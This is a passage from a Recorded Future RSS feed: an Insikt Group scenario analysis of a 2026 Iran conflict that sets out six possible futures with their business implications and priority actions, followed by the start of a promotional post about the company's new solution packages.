            <content:encoded><![CDATA[
        <p>The Iran situation remains volatile and uncertain, with material impacts for organizations.</p>
        <p>Leaders should plan for multiple future scenarios, prioritizing resilience and effective decision-making</p>
        <p><strong>Current State (April 10)</strong></p>
        <ul>
          <li><strong>Severe tensions persist despite a two-week ceasefire:</strong><br />The agreement remains fragile and conditional on reopening the Strait of Hormuz; each side has already accused Iran War: Future Scenarios and Business Implications the other of violations.</li>
          <li><strong>Maritime flows partially resume but remain uncertain:</strong><br />Disruptions and elevated security risks persist. President Trump has signaled readiness to resume strikes on Iranian infrastructure if ceasefire conditions are not met.</li>
          <li><strong>Economic conditions remain unstable:</strong><br />Energy markets remain volatile, with continued pressure on supply chains. Shipping, insurance, and aviation activity are only partially restored. Inside Iran, infrastructure damage is driving power shortages and industrial disruption.</li>
          <li><strong>Cyber activity has intensified</strong>:<br />Operations targeting energy and critical infrastructure are increasing, reinforcing systemic risk across key sectors.</li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1b1f2acb431306cd4d209bbb5f95b0224fc15fc9f.png?width=750&amp;format=png&amp;optimize=medium" width="398" height="561" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 1</strong>: An explosion in Tehran, February 28, 2026 (Source:</em> <em><a href="https://www.pbs.org/newshour/world/what-to-know-about-the-u-s-israel-attacks-on-iran">PBS</a>)</em></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1b020e8bcace97f79eda497ff78080fa22a246e06.png?width=750&amp;format=png&amp;optimize=medium" width="892" height="379" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 2:</strong></em> <em>Cone of Plausibility Overview: Iran Conflict</em> <em>(Source: Recorded Future)</em></div>
          </div>
        </div>
        <h2>Framework Overview</h2>
        <p>To assess how the Iran conflict could evolve over the next 6–12 months, Insikt Group analyzed regional and global dynamics using the <strong>PESTLE-M</strong> framework, covering <strong>Political, Economic, Social, Technological, Legal, Environmental,</strong> and <strong>Military</strong> domains, with a focus on Iran, the United States, Israel, and Gulf States.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_159b6d509a3a6f5a3d3b9155d4c282f74fa366642.png?width=750&amp;format=png&amp;optimize=medium" width="892" height="149" />
            </div>
          </div>
          <div>
            <div>Figure 3: PESTLE-M Framework (Source: Recorded Future)</div>
          </div>
        </div>
        <p>This analysis informed a scenario generation exercise using a <strong>Cone of Plausibility (CoP)</strong> method. The objective was not to predict a single outcome, but to explore a range of <strong>alternative futures</strong> based on observed signals and emerging trends.</p>
        <div>
          <div>
            <div>
              <p><strong>Wildcard</strong></p>
              <p><strong>Plausible</strong></p>
              <p><strong>Baseline</strong></p>
              <p><strong>Plausible</strong></p>
              <p>
                <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1123745b4ba7dc967aa307abce4f0cb1bdcc7631a.png?width=750&amp;format=png&amp;optimize=medium" width="560" height="381" />
              </p>
            </div>
          </div>
          <div>
            <div>Figure 4: Cone of Plausibility Framework (Source: Recorded Future)</div>
          </div>
        </div>
        <h2><br />Methodology</h2>
        <p>For each <strong>PESTLE-M</strong> category, we identified key <strong>drivers</strong> that could increase or decrease the likelihood of escalation, de-escalation, or sustained instability, and assessed how these dynamics may evolve under different <strong>assumptions</strong>. These were combined to develop <strong>six scenarios</strong>: one <strong>baseline</strong>, two <strong>plausible</strong> (best and worst case), and three <strong>wildcard</strong> scenarios, enabling organizations to evaluate how the conflict may unfold and the potential impacts on their operating environment.</p>
        <p>Within the CoP framework:</p>
        <ul>
          <li><strong>Drivers</strong> are signals and trends that could shape future developments</li>
          <li><strong>Assumptions</strong> reflect how those drivers may evolve over time</li>
          <li><strong>Scenarios</strong> describe how these dynamics could combine to produce distinct future states</li>
        </ul>
        <p>We define scenarios as follows:</p>
        <ul>
          <li><strong>Baseline:</strong> A forward projection of current trends and conditions</li>
          <li><strong>Plausible:</strong> A realistic alternative outcome based on evolving drivers and assumptions</li>
          <li><strong>Wildcard:</strong> A low-probability, high-impact scenario that challenges existing assumptions</li>
        </ul>
        <h2>Baseline Scenario: Fragile Ceasefire with Sustained Economic Disruption</h2>
        <p>Key Drivers <strong>and Assumptions</strong></p>
        <ul>
          <li>Conditional ceasefire <strong>-&gt; Underlying conflict causes unaddressed</strong></li>
          <li>Maritime coercion <strong>-&gt; Economic warfare persists</strong></li>
          <li>Infrastructure targeting <strong>-&gt; Energy disruption continues</strong></li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1915b1bdbe852f19651fd2a87f32416d9ec8cebcd.png?width=750&amp;format=png&amp;optimize=medium" width="512" height="368" />
            </div>
          </div>
          <div>
            <div>Figure 5: Brent oil prices and projections (Source: <a href="https://www.oxfordeconomics.com/resource/prolonged-war-in-iran-could-tip-the-global-economy-into-recession/">Oxford Economics</a>)</div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_124435e23803004755d4ea76bd411aa2046ba5a20.png?width=750&amp;format=png&amp;optimize=medium" width="1280" height="720" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 6:</strong></em> <em>Iran is also threatening maritime traffic through the Bab al-Mandab, another key route (Source:</em> <em><a href="https://timesofindia.indiatimes.com/defence/iran-parliament-planning-to-target-bab-el-mandeb-why-this-red-seagulf-of-aden-strait-matters-india-trade-chokepoint/articleshow/130017334.cms">Times of India</a>)</em></div>
          </div>
        </div>
        <h2>Baseline: A forward projection of current trends and conditions</h2>
        <p><strong>Ceasefire holds, but conflict shifts into sustained economic warfare.</strong></p>
        <p>A fragile ceasefire reduces the pace of direct military exchanges strikes, but the drivers of conflict remain unresolved. Iran lacks the capacity for decisive escalation but retains asymmetric leverage, while the US prioritizes energy market stability and conflict containment. The Strait of Hormuz reopens only intermittently, with recurring disruptions, inspections, and security incidents, keeping shipping, insurance, and energy markets under sustained pressure. Gulf financial, logistics, and technology sectors operate intermittently, airlines maintain some route suspensions, and cyber activity remains elevated against regional infrastructure and Western-linked organizations. The conflict evolves into economic coercion as a primary tool, driving elevated oil and gas prices, persistent market volatility, and tighter financing conditions. Supply chains gradually reconfigure away from high-risk routes, increasing costs and reducing efficiency. Russia benefits from sustained high energy prices and reduced Western focus, strengthening its position in Ukraine. China capitalizes on fragmentation by expanding alternative trade and financial networks, reinforcing a more bifurcated global system.</p>
        <h3>Likelihood</h3>
        <p><strong>Most likely if ceasefire holds without resolution:</strong> Conflict remains below full-scale war, but economic disruption persists as the dominant mode of competition.</p>
        <div>
          <div>
            <div><strong>Business Implications</strong></div>
            <div><strong>Priority Actions (0-90 days)</strong></div>
          </div>
          <div>
            <div><strong>Operational:</strong> Intermittent shipping, route, and supplier disruption increases cost and complexity</div>
            <div>Stress-test <strong>exposure to Hormuz-related</strong> shipping and energy disruption</div>
          </div>
          <div>
            <div><strong>Financial:</strong> Elevated energy prices and volatility sustain margin pressure and tighter financing</div>
            <div>Harden resilience for <strong>energy, logistics, and cyber-dependent</strong> operations</div>
          </div>
          <div>
            <div><strong>Competitive:</strong> Firms with diversified routing and lower energy exposure gain advantage</div>
            <div>Review <strong>sanctions, insurance, and counterparty risk</strong> across key jurisdictions</div>
          </div>
          <div>
            <div><strong>Legal:</strong> Evolving sanctions and emergency measures raise compliance burden and enforcement risk</div>
            <div></div>
          </div>
          <div>
            <div><strong>Reputational:</strong> Scrutiny over pricing, shortages, and regional exposure increases brand risk</div>
            <div></div>
          </div>
        </div>
        <h2>Plausible Scenario (Best Case): Managed Stalemate</h2>
        <p>Key Drivers <strong>and Assumptions</strong></p>
        <ul>
          <li>US threats and military strikes fail to coerce Iran into concession <strong>-&gt; Limited appetite for sustained conflict</strong></li>
          <li>Significant economic disruption <strong>-&gt; Economic costs drive political decisions</strong></li>
          <li>US military footprint in region <strong>-&gt; Potential for re-escalation</strong></li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_18d51aeb2def07a958821fbcdbd793d73232787f4.png?width=750&amp;format=png&amp;optimize=medium" width="569" height="356" />
            </div>
          </div>
          <div>
            <div>Figure 7: US President Trump delivers a warning to Iran at a White House Easter event (Source: <a href="https://www.pbs.org/newshour/politics/watch-live-trumps-hold-white-house-easter-egg-roll-as-iran-war-escalates">PBS News</a>)</div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_107d6e3aa00de195130d129c6ba9a979c794548f9.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="900" />
            </div>
          </div>
          <div>
            <div>Figure 8: Iran has used maritime traffic through the Strait of Hormuz as leverage in the conflict (Source: <a href="https://www.cnbc.com/2026/03/02/strait-of-hormuz-crisis-us-iran-israel-war-shipping-trade-oil.html">CNBC</a>)</div>
          </div>
        </div>
        <h2><strong>Plausible:</strong> A realistic alternative outcome based on evolving drivers and assumptions</h2>
        <p><strong>The US portrays its leadership decapitation campaign as successfully facilitating “regime change,” creating space for diplomatic engagement with “new” leadership. Iran maintains increased level of oversight over the Strait of Hormuz, while internally the IRGC plays a greater role in strategic decision-making.</strong></p>
        <p>Domestic economic and political pressure leads to the US to scale back military operations without clear resolution of key regional security issues, including Iran’s right to nuclear enrichment, ballistic missile program, and support to regional proxies. Maritime traffic slowly returns to pre-war levels, with a new protocol for vessel traffic under an internationally accepted mandate. Iran retains an increased level of oversight over the Strait of Hormuz passages and profits from the traffic. This relieves some economic strain, though lingering supply chain effects remain. Cyber attacks persist as a means of asymmetric coercion. The US lifts some sanctions against the “new” regime, but other sanctions remain in place, complicating the regulatory environment. Interest in renewable energy increases as companies seek to mitigate against future disruption, though oil demand returns to pre-conflict norms. Israel continues limited, highly targeted strikes, while the US retains its military presence in the region, keeping the possibility for re-escalation open.</p>
        <h3>Likelihood</h3>
        <p><strong>Less likely as conflict continues:</strong> This scenario assumes the US’s limited appetite for full-scale war, but the opportunities for de-escalation diminish as the conflict persists.</p>
        <div>
          <div>
            <div><strong>Business Implications</strong></div>
            <div><strong>Priority Actions (0-90 days)</strong></div>
          </div>
          <div>
            <div><strong>Operational:</strong> Recurring disruption risk for regional transport corridors, ports, and cross-border trade</div>
            <div>Keep <strong>sanctions, export-control, and third-party due diligence</strong> on heightened alert</div>
          </div>
          <div>
            <div><strong>Financial:</strong> Long-term effects of recovery</div>
            <div>Build <strong>redundancy</strong> into critical suppliers</div>
          </div>
          <div>
            <div><strong>Competitive:</strong> Competitors with diversified sourcing, redundancy, and mature sanctions controls are best positioned to withstand ongoing shocks</div>
            <div>Maintain an <strong>elevated cyber posture</strong></div>
          </div>
          <div>
            <div><strong>Legal:</strong> Continued tensions mean sanctions and export controls may tighten again with little notice</div>
            <div>Tighten <strong>executive decision rights</strong> and trigger points for regional exposure</div>
          </div>
          <div>
            <div><strong>Reputational:</strong> Price increases tied to lingering supply-chain effects may trigger accusations of profiteering</div>
            <div><strong>Accelerate resilience investments</strong> with strategic upside, especially energy efficiency, renewable sourcing, and inventory visibility</div>
          </div>
        </div>
        <h2>Plausible Scenario (Worst Case): Regional Conflict with Gulf Involvement</h2>
        <p>Key Drivers <strong>and Assumptions</strong></p>
        <ul>
          <li>Conditional ceasefire <strong>-&gt; Continuing provocation re-escalates conflict</strong></li>
          <li>Strait of Hormuz chokehold effective <strong>-&gt; Asymmetric advantage to disruption</strong></li>
          <li>Gulf infrastructure targeted <strong>-&gt; Multi-state escalation</strong></li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1b38ced8d30b196363e863e8fd1e1885036e97ded.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1066" />
            </div>
          </div>
          <div>
            <div><strong>Figure 9:</strong> The Saudi crown prince reportedly urged President Trump to continue war (Source: <a href="https://www.nytimes.com/2026/03/24/us/politics/saudi-prince-iran-trump.html">NYT</a>)</div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1c1b0a0987467003970eb1d67ec3764b0d7f291ad.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1029" />
            </div>
          </div>
          <div>
            <div><strong>Figure 10:</strong> The UAE has been proactive in the conflict, taking nonmilitary measures against Iran (Source: <a href="https://www.scmp.com/week-asia/economics/article/3348996/uae-squeezes-iranian-economic-lifeline-retaliation-attacks">South China Post</a>)</div>
          </div>
        </div>
        <h2><strong>Plausible:</strong> A realistic alternative outcome based on evolving drivers and assumptions</h2>
        <p><strong>Ceasefire collapses, triggering multi-state regional war.</strong></p>
        <p>A temporary ceasefire breaks down following renewed strikes and failure to secure maritime access. Iran escalates missile and proxy attacks, including targeting Gulf energy infrastructure. With critical thresholds crossed, Saudi Arabia, the UAE, and Bahrain enter the conflict directly to protect economic and political stability. The Strait of Hormuz and Bab al-Mandab become sustained conflict zones, with repeated attacks, mining, and vessel seizures. Shipping and insurance markets withdraw at scale, severely constraining global energy flows. Energy prices surge, driving inflation and recession risk globally. Fuel shortages emerge in import-dependent economies, triggering industrial slowdowns, reduced mobility, and rolling outages. Cyber operations escalate into coordinated campaigns targeting energy, logistics, and financial systems. Legal fragmentation accelerates, with overlapping sanctions regimes, asset controls, and enforcement actions constraining cross-border operations. Russia exploits elevated energy revenues and reduced Western focus to press its advantage in Ukraine. China remains indirect but leverages Western overstretch to increase pressure on Taiwan.</p>
        <h3>Likelihood</h3>
        <p><strong>More likely if ceasefire collapses and Gulf assets are targeted:</strong> Escalation becomes self-reinforcing once regional actors are drawn into direct conflict.</p>
        <div>
          <div>
            <div><strong>Business Implications</strong></div>
            <div><strong>Priority Actions (0-90 days)</strong></div>
          </div>
          <div>
            <div><strong>Operational:</strong> Supplier and production relocation, increased redundancy, and higher cost and complexity</div>
            <div><strong>Harden critical infrastructure</strong> dependences (energy, logistics, third parties)</div>
          </div>
          <div>
            <div><strong>Financial:</strong> Energy costs and inflation drive margin pressure, while financing becomes tighter and more expensive</div>
            <div>Test <strong>business continuity under outage</strong> scenarios</div>
          </div>
          <div>
            <div><strong>Competitive:</strong> Resilient, energy-secure firms gain advantage; exposed firms lose share</div>
            <div><strong>Segment and isolate high-value systems;</strong> prioritize offline backups and rapid recovery</div>
          </div>
          <div>
            <div><strong>Legal:</strong> Fragmented, fast-changing sanctions increase compliance burden and legal risk</div>
            <div>Review <strong>third-party and regional concentration risk</strong>, particularly for Middle</div>
          </div>
          <div>
            <div><strong>Reputational:</strong> Scrutiny over pricing, shortages, and exposure drives brand and trust risk</div>
            <div>Establish <strong>crisis governance</strong> and decision cadence</div>
          </div>
        </div>
        <h2>Wildcard Scenario 1: Lasting Peace Agreement</h2>
        <p>Key Drivers <strong>and Assumptions</strong></p>
        <ul>
          <li>Severe degradation of Iranian infrastructure <strong>-&gt; Iran compelled to concede</strong></li>
          <li>Global economic disruption <strong>→ International support for peace process</strong></li>
          <li>Sustained disruption to Hormuz and energy markets <strong>→ Mutual incentive to stabilize</strong></li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_15ce8db2bf558a0ff77b27d30d8ea263a96999b49.png?width=750&amp;format=png&amp;optimize=medium" width="1440" height="960" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 11:</strong></em> <em>Pakistan has offered to host talks to broker peace between US, Iran (Source:</em> <em><a href="https://time.com/article/2026/03/29/iran-war-pakistan-talks-trump/">Time</a>)</em></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1c4d4feb2a20813e86458cd2601e1220aab347bc2.png?width=750&amp;format=png&amp;optimize=medium" width="466" height="269" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 12:</strong></em> <em>Traffic through the Strait of Hormuz dropped significantly since conflict began (Source:</em> <em><a href="https://www.icis.com/chemicals-and-the-economy/2026/03/strait-of-hormuz-closure-starts-to-have-major-economic-impact/">Lloyd's List</a>)</em></div>
          </div>
        </div>
        <h2><strong>Wildcard:</strong> A low-probability, high-impact scenario that challenges existing assumptions</h2>
        <p><strong>Negotiated settlement reached between the US and Iran, allowing for longterm drawdown of conflict.</strong><br />Significant degradation of Iran’s energy, military, and industrial infrastructure, combined with mounting economic strain, power shortages, and reduced capacity to sustain conflict, compels Tehran to reassess its position and signal willingness to accept concessions. In parallel, the United States faces rising economic costs from prolonged energy disruption, inflation, and market instability, increasing pressure to stabilize conditions. A negotiated settlement emerges through indirect talks, mediated by Oman, with Iran accepting concessions on maritime security and nuclear constraints in exchange for phased sanctions relief and assurances against further strikes. Iran seeks a revised Strait of Hormuz security framework and limited economic concessions, though broader demands such as reparations are only partially addressed. The Strait of Hormuz fully reopens under agreed security mechanisms, restoring stable shipping and energy flows. Sanctions ease gradually, enabling reintegration of Iranian energy exports and limited foreign investment. Military activity declines sharply, cyber operations reduce, and global energy markets stabilise, easing inflationary pressures and improving financial conditions.</p>
        <h3>Likelihood</h3>
        <p><strong>Low probability:</strong> Requires significant concessions from one side under sustained pressure.</p>
        <div>
          <div>
            <div><strong>Business Implications</strong></div>
            <div><strong>Priority Actions (0-90 days)</strong></div>
          </div>
          <div>
            <div><strong>Operational:</strong> Supply chains stabilize, enabling efficiency gains and reduced redundancy</div>
            <div><strong>Monitor stabilization signals</strong> and time market re-entry strategically</div>
          </div>
          <div>
            <div><strong>Financial:</strong> Lower energy prices ease margin pressure and improve access to capital</div>
            <div>Secure <strong>long-term energy and supply contracts</strong> at favorable prices</div>
          </div>
          <div>
            <div><strong>Competitive:</strong> Early movers capture growth opportunities in recovering markets</div>
            <div><strong>Re-optimize supply chains</strong> and reduce excess redundancy</div>
          </div>
          <div>
            <div><strong>Legal:</strong> Sanctions easing reduces compliance burden and enables cross-border activity</div>
            <div><strong>Reassess sanctions</strong> exposure and compliance frameworks</div>
          </div>
          <div>
            <div><strong>Reputational:</strong> Stabilization and reinvestment strengthen stakeholder trust</div>
            <div>Align <strong>growth and investment strategy</strong> to recovering regional markets</div>
          </div>
        </div>
        <h2>Wildcard Scenario 2: Iranian Regime Collapses</h2>
        <p>Key Drivers <strong>and Assumptions</strong></p>
        <ul>
          <li>Decades of political repression <strong>-&gt; No viable alternative to Iranian regime</strong></li>
          <li>Sectarian and political unrest <strong>-&gt; Protracted internal conflic</strong>t</li>
          <li>Targeting of leadership <strong>-&gt; Regime instability and eventual collapse</strong></li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1f76e8d0ed0b303d248403a2219cbf67447bf89b9.png?width=750&amp;format=png&amp;optimize=medium" width="664" height="374" />
            </div>
          </div>
          <div>
            <div><strong>Figure 13:</strong> Mass protests against the regime in December 2025 were brutally repressed (Source: <a href="https://www.lemonde.fr/en/international/article/2026/01/09/iran-cuts-internet-as-protest-movement-against-regime-grows_6749254_4.html#">Le Monde</a>)</div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_15426b985b3d8912decf5b57a8bf69dcca736409f.png?width=750&amp;format=png&amp;optimize=medium" width="900" height="505" />
            </div>
          </div>
          <div>
            <div><strong>Figure 14:</strong> Displaced Syrians have lived in refugee camps for ten years, demonstrating the long-term impacts of internal conflict (Source: <a href="https://www.unhcr.org/news/stories/jordans-zaatari-refugee-camp-10-facts-10-years">UNHCR</a>)</div>
          </div>
        </div>
        <h2><strong>Wildcard:</strong> A low-probability, high-impact scenario that challenges existing assumptions</h2>
        <p><strong>The Islamic Republic collapses, plunging the country into a civil war and complex humanitarian crisis.</strong></p>
        <p>The US and Israel’s persistent “decapitation strategy” weakens the regime to the point where it is no longer able to assert internal control. With no viable alternative, the country falls into a multiparty civil war made up of pro-regime, pro-democracy, and assorted regional and ideological militias. Food and fuel shortages are severe in certain regions. Refugee camps are built in Iraq while Europe’s asylum system faces overwhelming demands. The US claims Kharg Island in the chaos and asserts control over the Strait of Hormuz, mitigating international economic damage. However, the political instability gives pro-regime and other ideological groups a base for asymmetric operations, leading to persistent regional disruption. Cyber capabilities degrade amid internal fighting, though some hacktivist operations persist against a wider variety of ideological enemies. Damage to water and energy facilities sustained during the conflict exacerbates humanitarian crisis and slows recovery. Russia supplies military support to pro-regime factions, but not enough to significantly tilt the balance of power.</p>
        <h2>Likelihood</h2>
        <p><strong>Long-term resilience of regime and viability of alternatives is unknown</strong>, making it difficult to assess likelihood with confidence.</p>
        <div>
          <div>
            <div><strong>Business Implications</strong></div>
            <div><strong>Priority Actions (0-90 days)</strong></div>
          </div>
          <div>
            <div><strong>Operational:</strong> Reduced reliability of just-in-time inventory models, especially for firms dependent on Gulf maritime corridors</div>
            <div><strong>Segment critical operations</strong></div>
          </div>
          <div>
            <div><strong>Financial:</strong> Long-term increase in operational and energy costs</div>
            <div><strong>Harden sanctions</strong> and third-party controls</div>
          </div>
          <div>
            <div><strong>Competitive:</strong> Larger firms use stronger government relationships or balance sheets to secure logistics</div>
            <div>Require an <strong>immediate review of regional dependencies,</strong> with backup routing and alternate sourcing plans for critical business lines</div>
          </div>
          <div>
            <div><strong>Legal:</strong> Export-control failures involving dual-use goods, technology, industrial inputs, or cyber tools</div>
            <div>Ensure <strong>employee protection measures</strong> are ready across the region</div>
          </div>
          <div>
            <div><strong>Reputational:</strong> Activist or online campaigns tying the firm to foreign intervention or opportunism</div>
            <div>Create a <strong>90-day resilience plan</strong> including decision triggers for escalation or market withdrawal</div>
          </div>
        </div>
        <h2>Wildcard Scenario 3: Nuclear Crisis</h2>
        <p>Key Drivers <strong>and Assumptions</strong></p>
        <ul>
          <li>Protracted high-intensity conflict <strong>-&gt; Increased likelihood of miscalculation</strong></li>
          <li>Location of facility <strong>-&gt; Risks of radiological contamination spread by air and water</strong></li>
          <li>Diplomatic failures <strong>-&gt; Inability to coordinate on response</strong></li>
        </ul>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_11b53b765492fc8b26c103c37690c25df9c8cb78b.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="900" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 15:</strong></em> <em>Bushehr has not yet been a direct target, though missiles have landed near it (Source:</em> <em><a href="https://www.developmentaid.org/news-stream/post/205823/iaea-grossi-bushehr-nuclear-plant-attack-iran-safety-concern-2026">Development Aid</a>)</em></div>
          </div>
        </div>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="Screenshot 2026-04-08 at 4.38.23 PM.png" src="https://www.recordedfuture.com/ko/media_1d81874eed5075ce08a2b37cbf7d2815150e3f685.png?width=750&amp;format=png&amp;optimize=medium" width="1082" height="692" />
            </div>
          </div>
          <div>
            <div><em><strong>Figure 16:</strong></em> <em>Weather patterns following the Chernobyl nuclear disaster spread radiological material affecting up to 6 million people (Source:</em> <em><a href="https://www.unscear.org/unscear/en/publications/2024_2.html">UNSCEAR</a>)</em></div>
          </div>
        </div>
        <h2><strong>Wildcard:</strong> A low-probability, high-impact scenario that challenges existing assumptions</h2>
        <p><strong>Missile strikes hitting a nuclear facility lead to a radiological incident, causing immediate global shock and rapid escalation.</strong></p>
        <p>A missile strike causes extensive damage to Iran’s Bushehr civilian nuclear power facility, causing radiological release with cross-border contamination. This occurs due to escalation, miscalculation, or degraded command and control. Immediate impacts include evacuation zones and disruption to regional energy supply. Emergency response efforts are delayed by ongoing conflict, limiting containment and extending environmental and economic damage. As a result, southern Iran and Gulf States experience long-term harm to drinking water supply and maritime food sources. The conflict also prevents long-term monitoring in Iran, which extends the long-term health and environmental damage from inadvertent exposure. Contamination further restricts maritime trade routes in the Gulf, while energy markets react sharply to both supply disruption and elevated systemic risk. Cyber and information operations amplify panic and misinformation.</p>
        <h3>Likelihood</h3>
        <p><strong>Low probability, high impact:</strong> Risk of intentional or unintended strike increases under sustained conflict.</p>
        <div>
          <div>
            <div><strong>Business Implications</strong></div>
            <div><strong>Priority Actions (0-90 days)</strong></div>
          </div>
          <div>
            <div><strong>Operational:</strong> Disruption to regional operations and supply chains; site closures</div>
            <div>Activate <strong>crisis management</strong> and continuity protocols</div>
          </div>
          <div>
            <div><strong>Financial:</strong> Extreme market volatility and energy price spikes</div>
            <div>Protect personnel and <strong>account for regional workforce exposure</strong></div>
          </div>
          <div>
            <div><strong>Competitive:</strong> Firms with geographic diversification gain advantage</div>
            <div>Secure critical systems and <strong>prepare for sustained disruption</strong></div>
          </div>
          <div>
            <div><strong>Legal:</strong> Emergency regulations, sanctions, and liability exposure increase</div>
            <div>Identify <strong>alternative routes</strong> and supply chain contingencies</div>
          </div>
          <div>
            <div><strong>Reputational:</strong> Heightened scrutiny around safety, workforce protection, and response</div>
            <div><strong>Manage disinformation</strong> through strong crisis communications process</div>
          </div>
        </div>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_1627d52be2bcdad9118913daf3e68f8df1cb60111.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[A New Way to Buy Recorded Future: Solutions and Packages Built for the 2026 Threat Landscape]]></title>
            <link>https://www.recordedfuture.com/ko/blog/recorded-future-solutions-packages</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/blog/recorded-future-solutions-packages</guid>
            <pubDate>Tue, 14 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Recorded Future is rolling out new pricing and packaging that bundles its intelligence capabilities into four solutions and three tiered plans, with unlimited users and integrations included.]]></description>
            <content:encoded><![CDATA[
        <div>
          <div>
            <div>
              <ul>
                <li>Recorded Future is now offering four solutions covering cyber operations, digital risk protection, third-party risk, and payment fraud.</li>
                <li>Three tiered packages (Core, Professional, Elite) bundle these solutions to scale with an organization's security program.</li>
                <li>Packages include unlimited users and integrations so intelligence reaches everyone who needs it.</li>
              </ul>
            </div>
          </div>
        </div>
        <p>The global threat landscape didn't simplify in 2025. It shattered. Recorded Future's Insikt Group® <a href="https://www.recordedfuture.com/ko/research/state-of-security#download-the-full-report"></a><a href="https://www.recordedfuture.com/ko/research/state-of-security#download-the-full-report">2026 State of Security</a> documented how geopolitical fragmentation, state-sponsored operations, and criminal ecosystem adaptation reshaped global risk. Threats that once stayed in distinct lanes converged, and they converged fast.</p>
        <p>Consider what Insikt Group® tracked last year:</p>
        <ul>
          <li>State-sponsored cyber actors shifted from intelligence collection to persistent access, pre-positioning inside target infrastructure so they can disrupt operations the moment geopolitical tensions escalate.</li>
          <li>Weak governance and systemic corruption <a href="https://www.cnn.com/2026/01/04/asia/china-myanmar-scam-crime-families-intl-hnk-dst">fueled</a> industrialized cybercrime, enabling payment fraud and criminal operations to scale like legitimate businesses.</li>
          <li>Influence operators and hacktivist groups multiplied alongside rising interstate conflict, amplifying fear, uncertainty, and doubt through exaggerated exploit claims.</li>
          <li>Loosely organized criminal collectives used social engineering to compromise third-party SaaS platforms, rapidly adapting to law enforcement action and traditional defenses alike.</li>
        </ul>
        <p>The risk surface has expanded well beyond networks and endpoints. Your brand, your third-party vendors, your payment networks: each has its own threat actors, its own attack methods, and its own intelligence requirements. Yet most intelligence programs only cover one of these domains. Or they monitor them in silos, with no shared context.</p>
        <p>The right intelligence, from the right sources, at the right time, is a critical competitive advantage. But intelligence only matters if you can act on it across every critical risk domain before attackers reach their objective.</p>
        <h2>Re-Imagining How Intelligence Is Delivered And Operationalized</h2>
        <p>Historically, Recorded Future has been sold on a <strong>per-user</strong> and <strong>per-capability</strong> basis - a model that worked well in a simpler world where security teams were focused on solving the most urgent problem in front of them.</p>
        <p>Today’s threat landscape is <strong>fast, more complex, and deeply interconnected</strong>. Customers are no longer looking for point solutions, they’re asking for a fundamentally different way to consume and operationalize intelligence.</p>
        <p>Customers are asking us to provide:</p>
        <ul>
          <li>Complete capabilities to support use cases aligned with core risk domains.</li>
          <li>Democratized access to intelligence across teams, workflows and systems.</li>
          <li>A simplified and predictable way to purchase for ease of budgeting and adoption.</li>
        </ul>
        <p>In response, we’ve re-imagined Recorded Future is delivered:</p>
        <p><strong>“Four Solutions. Three Packages. One Intelligence Foundation.”</strong></p>
        <p>A unified approach designed to scale with your organization, accelerate time to value, and embed intelligence into every decision that matters.</p>
        <h2>Four Solutions for Four Critical Risk Domains</h2>
        <p>Your threats span your infrastructure, your brand, your vendors, and your payment networks. Your intelligence should too. We’ve re-organized our platform into <a href="https://www.recordedfuture.com/ko/solutions-overview">four purpose-built solutions</a> tied to distinct domains of enterprise risk.</p>
        <p><strong>Cyber Operations</strong> gives your security team the intelligence, workflows, and autonomous actions to detect, investigate, and respond to threats targeting your infrastructure. Alert triage, real-world vulnerability prioritization, malware analysis, proactive hunting: this is where reactive firefighting becomes predictive, intelligence-led defense.</p>
        <p><strong>Digital Risk Protection</strong> helps detect and disrupt threats that never touch your network but directly damage your business: brand impersonation, domain abuse, credential leaks, and phishing infrastructure across the open, deep, and dark web. With access to active infostealer logs and automated IAM remediation, your team can act on exposures within hours, not weeks.</p>
        <p><strong>Third-Party Risk</strong> delivers continuous, intelligence-driven monitoring of your vendor ecosystem. Security ratings combined with real-time threat intelligence surface breaches, ransomware activity, and dark web exposure days or weeks before formal vendor notification, giving your security and GRC teams evidence they can act on and defend to stakeholders.</p>
        <p><strong>Payment Fraud Intelligence</strong> identifies stolen payment cards, compromised checks, scam merchants, and web-skimming activity earlier in the fraud lifecycle, so financial institutions can stop losses before they materialize.</p>
